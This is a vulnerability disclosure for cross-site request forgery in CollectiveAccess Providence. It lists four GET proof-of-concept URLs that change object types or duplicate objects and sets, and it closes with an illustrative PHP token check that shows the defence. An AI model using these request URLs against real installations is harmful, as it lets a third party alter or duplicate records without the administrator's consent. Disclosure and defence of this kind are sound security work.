Cross-Site Request Forgery (CSRF) in collectiveaccess/providence
Sep 26th 2021
I have found more endpoints that allow edit/duplicate actions and were not protected from CSRF. The endpoints are:
1: Edit Global Value in Pawtucket.
2: Change object type.
3: Duplicate object.
4: Duplicate items in the set and add to another set.
Proof of Concept
Via GET requests:
1. [URL]/providence/index.php/manage/Pawtucket/saveGlobalValues?_formName=globalValuesForm&form_timestamp=1632635941&hours_of_operation=ABC
2. [URL]/providence/index.php/editor/objects/ObjectEditor/ChangeType?_formName=caChangeTypeForm&form_timestamp=1632633565&type_id=23&object_id=7
3. [URL]/providence/index.php/editor/objects/ObjectEditor/Edit?_formName=DuplicateItemForm&object_id=34&mode=dupe
4. [URL]/providence/index.php/manage/sets/SetEditor/DuplicateItems?_formName=caDupeSetItemsForm&form_timestamp=1632634975&setForDupes=new&set_id=2
Compromise on the integrity and availability of objects.
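The requests above carry a `_formName` and a `form_timestamp` but nothing tied to the user's session, and they are accepted over GET. The following is an added example of the check a state-changing handler needs, not code from this report or from CollectiveAccess; the function names and the `csrf_token` parameter name are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper names; not part of the CollectiveAccess code base.

/** Issue a per-session token to embed as a hidden field in each form. */
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/**
 * Decide whether a state-changing request may proceed.
 * GET is refused outright, so a link or image tag cannot trigger the action.
 */
function csrf_request_allowed(string $method, array $params, array $session): bool
{
    if (strtoupper($method) !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $params['csrf_token'] ?? '';
    if (!is_string($expected) || !is_string($supplied) || $expected === '' || $supplied === '') {
        return false;
    }
    // Constant-time comparison of the session token with the submitted one.
    return hash_equals($expected, $supplied);
}

// Constructed sample data modelled on the parameters in the report's second URL.
$session = [];
$token   = csrf_issue_token($session);
$params  = ['_formName' => 'caChangeTypeForm', 'type_id' => '23', 'object_id' => '7'];

$cases = [
    'GET without token'     => ['GET',  $params],
    'POST without token'    => ['POST', $params],
    'POST with wrong token' => ['POST', $params + ['csrf_token' => str_repeat('0', 64)]],
    'POST with valid token' => ['POST', $params + ['csrf_token' => $token]],
];
foreach ($cases as $label => [$method, $p]) {
    printf("%-22s %s\n", $label, csrf_request_allowed($method, $p, $session) ? 'allowed' : 'rejected');
}
```

Only the last case is allowed; a request built from one of the report's URLs fails on the method check before the token is even looked at.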